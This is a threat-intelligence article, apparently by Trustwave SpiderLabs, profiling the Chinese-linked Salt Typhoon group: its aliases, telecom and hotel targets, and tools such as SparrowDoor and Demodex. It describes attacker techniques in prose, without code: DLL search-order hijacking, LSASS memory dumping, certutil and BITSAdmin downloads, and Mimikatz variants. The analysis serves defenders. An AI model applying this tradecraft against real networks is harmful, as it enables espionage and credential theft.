Analyzing Salt Typhoon: Telecom Attacker

December 12, 2024 5 Minute Read

• Unveiling Salt Typhoon: A New Wave in Cyber Espionage
  Discover how this advanced Chinese-speaking threat actor targets telecom giants, using sophisticated tools like SparrowDoor and Demodex to breach and exfiltrate sensitive data.
• The Who, What, and Why of Salt Typhoon's Attacks
  Gain insights into Salt Typhoon's history, tactics, and objectives, from their focus on tracking persons of interest to compromising global telecommunications and government networks.
• Inside the Salt Typhoon Arsenal: Techniques and Tools
  Explore the group's toolkit, including custom malware, lateral movement strategies, and evasion techniques that outsmart even the most advanced forensic tools.

Salt Typhoon is a Chinese-speaking threat actor that the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have tied to a series of attacks that breached and exfiltrated data from several of the world's most prominent telecommunications companies.

Trustwave SpiderLabs has created a deep analysis of the threat group Salt Typhoon, detailing the group's history, techniques, tactics, and procedures (TTP), and preferred targets. The gang is known to target Windows systems and leverages DLL search-order hijacking to install custom-made back doors, notably SparrowDoor and Demodex.

"Threat actors affiliated with the People's Republic of China (PRC) have targeted commercial telecommunications providers to compromise sensitive data and engage in cyber espionage," said Assistant Director Bryan Vorndran of the FBI's Cyber Division.

Trustwave SpiderLabs reported that, like many espionage groups, this group's exact objectives and end goals remain unclear. However, based on public reports, its TTPs, malware usage, choice of victims, and later attack stages-such as data exfiltration and operational impact-a medium-confidence hypothesis suggests their main goal is tracking the movements of persons of interest.

Its targeting of hotels seems to support cyber-espionage efforts by enabling them to monitor the locations of key individuals. Similarly, their focus on telecommunications and airline companies likely serves to gather intelligence, intercept communications, or trace the movements of their targets.

Salt Typhoon's Back Story

In March 2021, during widespread exploitation of the ProxyLogon vulnerabilities, ESET identified a new cyberespionage group named "FamousSparrow," believed to have been active since 2019. ProxyLogon, disclosed in January 2021, fueled global cyberattacks, with over 10 APT groups exploiting Microsoft Exchange Server flaws. Salt Typhoon launched attacks on March 3, 2021, a day after patches were released, indicating prior knowledge of the vulnerabilities. Their primary targets included hotels, governments, law firms, and engineering firms, echoing the focus of groups like DarkHotel and APT28.

In investigating Exchange server attacks, Kaspersky linked activity to July 2020 and named the actor "GhostEmperor" for its advanced tools and anti-forensic techniques. After going quiet, the group resurfaced in late 2023 when Sygnia's Incident Response team uncovered network compromises involving Demodex, a rootkit tied to Salt Typhoon. Another lull ended in September 2024 when The Wall Street Journal reported Salt Typhoon had breached US Internet Service Providers (ISPs) in a campaign targeting sensitive information, potentially compromising Cisco routers.

Government and Criminal Affiliations

Salt Typhoon, as Microsoft tracks them, is also known by the aliases FamousSparrow (ESET), UNC2286 (Mandiant), and GhostEmperor (Kaspersky). The FBI and CISA reported it is known to be affiliated with the Chinese government.

Salt Typhoon has been linked to tools tied to espionage operations by groups like DRBControl and SparklingGoblin, which is thought to be part of the Winnti Group. However, Salt Typhoon is recognized as a distinct entity, even though it has strong connections with other Chinese APT groups and unidentified Chinese-speaking threat clusters.

According to AhnLab, Salt Typhoon has used the SparrowDoor loader-malware also associated with Tropic Trooper (APT23)-which shares similarities with the Xiangoop loader. Mandiant has noted overlaps in infrastructure between UNC4841, another China-based espionage actor, and UNC2286, also known as Salt Typhoon. Trend Micro has highlighted similar tactics, techniques, and procedures (TTPs) between Salt Typhoon and Earth Estries, a cyberespionage group active since 2020.

Additionally, Salt Typhoon's primary tool, Demodex, shares characteristics with the Derusbi rootkit, which has been attributed to various Chinese-speaking threat actors. There are also notable parallels between CrowDoor and SparrowDoor, further reinforcing connections to other groups.

Salt Typhoon's Target List

The group's victims run the gamut from hotels to telecoms, but all are being attacked with an eye toward garnering information about individuals. Its recent attacks have focused on the international telecommunications industry to obtain the metadata of a large number of customers, including information on the dates, times, and recipients of calls and texts.

Trustwave SpiderLabs noted that in early 2021, Salt Typhoon focused its efforts on hotels worldwide, with a particular emphasis on Southeast Asia and notable targets in Egypt, Afghanistan, and Ethiopia. These operations extended to government entities and telecommunications companies.

The group has consistently targeted the information and communication technology sector, including wireline and wireless telephone providers, as well as internet service companies. Many of these companies maintain close ties to government agencies and the defense industrial base (DIB) of their respective countries.

In addition to telecoms and government entities, Salt Typhoon's operations have expanded to include militaries, solar energy companies, financial institutions, NGOs, international organizations, engineering firms, and law practices. Their reach spans nations such as Brazil, Burkina Faso, South Africa, Canada, Israel, France, Guatemala, Lithuania, Saudi Arabia, Taiwan, Thailand, and the United Kingdom.

Most recently, Salt Typhoon has launched a cyberespionage campaign targeting US-based ISPs. These attacks underline the group's continued focus on telecommunications, likely aiming to intercept communications, monitor activities, and enhance their intelligence-gathering capabilities.

Salt Typhoon's TTPs

Salt Typhoon's tool kit is massive, utilizing legitimate, custom-made, and borrowed tools.

Salt Typhoon is known for deploying custom backdoors, notably SparrowDoor and Demodex. SparrowDoor is a versatile 32-bit loader and backdoor targeting Windows operating systems, with capabilities such as renaming or deleting files, creating directories, shutting down processes, exfiltrating specified file contents, and establishing an interactive reverse shell. This backdoor has been consistently used in Salt Typhoon operations, including during their exploitation of the ProxyLogon vulnerability in Microsoft Exchange and other Internet-facing applications.

The malware also has a kill switch to remove persistence and all related files from a compromised system.

The group leverages DLL search-order hijacking to install SparrowDoor and establishes encrypted TLS connections for command and control (C2.) The malware exploits DLL search order hijacking by using the legitimate executable Indexer.exe, which requires the library K7UL.dll.

Demodex, a rootkit used by the group, is specifically designed to hide malware artifacts and evade forensic analysis by removing PE headers from memory and implementing advanced obfuscation techniques. This obfuscation includes string encoding and API call masking, making static analysis difficult.

The group's malware also evades common forensic tools like WinDbg and Volatility, which struggle to detect Demodex's presence in memory.

Once inside a network, Salt Typhoon primarily leverages a combination of legitimate, open-source tools and some custom or lesser-known ones to steal information from infected systems and spread laterally within networks.

Key tools include NBTscan, a command-line utility for scanning networks for NetBIOS information, allowing attackers to identify logged-in users and IP addresses. PsExec, PsList, and ProcDump, from the Sysinternals suite, are used for remote process execution, listing running processes, and dumping LSASS.exe memory to capture passwords.

WinRAR is utilized to compress and exfiltrate sensitive files like images, documents, and mailbox contents retrieved via PowerShell. Certutil and BITSAdmin facilitate the downloading of malicious scripts from C2 servers, avoiding detection by common methods.

Cscript executes Visual Basic scripts, such as ListDomain.vbs, to gather information on the domain or workgroup of the infected system, while Schtasks runs and deletes scheduled tasks to evade detection.

Powercat, an open-source tool, enables communication with C2 servers, and Ladon assists in lateral movement by scanning for open ports and vulnerabilities.

The group also employs custom tools like Mimikat_ssp, a Mimikatz variant designed to evade antivirus detection, Get-PassHashes.ps1 for dumping password hashes, GetPwd for extracting passwords from memory, Token.exe to execute files with system privileges, as well as any available LOLBins.

Additionally, Salt Typhoon's tools share similarities with malware, like Derusbi, from toolkits used by other Chinese threat groups, including APT41, APT17, Leviathan, and Stone Panda.

Derusbi is a DLL-based backdoor capable of obtaining directory, file, and drive listings; creating reverse shells; capturing screens; recording video and audio; managing processes; enumerating and modifying registry keys and values; logging keystrokes; extracting usernames and passwords from protected storage; and performing file operations like renaming, deleting, copying, moving, reading, and writing. In one instance, the attackers also deployed a variant of Motnug, a shellcode loader frequently used to load the CROSSWALK backdoor, which is part of SparklingGoblin's arsenal of .NET loaders.

What Does All This Mean?

Salt Typhoon exemplifies the advanced persistence and adaptability of state-sponsored cyber threats. By targeting key industries like telecommunications and hospitality, the group supports espionage efforts to monitor individuals and intercept sensitive data. Continued vigilance, threat intelligence sharing, and robust cybersecurity practices are vital to countering the evolving tactics of sophisticated attackers like Salt Typhoon.

Trustwave's 2025 Cybersecurity Predictions: The Rise of Generative AI Data Breaches, Quantum Computing, and Cyber Warfare

'Tis the Season for Artificial Intelligence-Generated Fraud Messages

Enhancing Cybersecurity in Higher Education: Trustwave and Curtin University's Collaborative Journey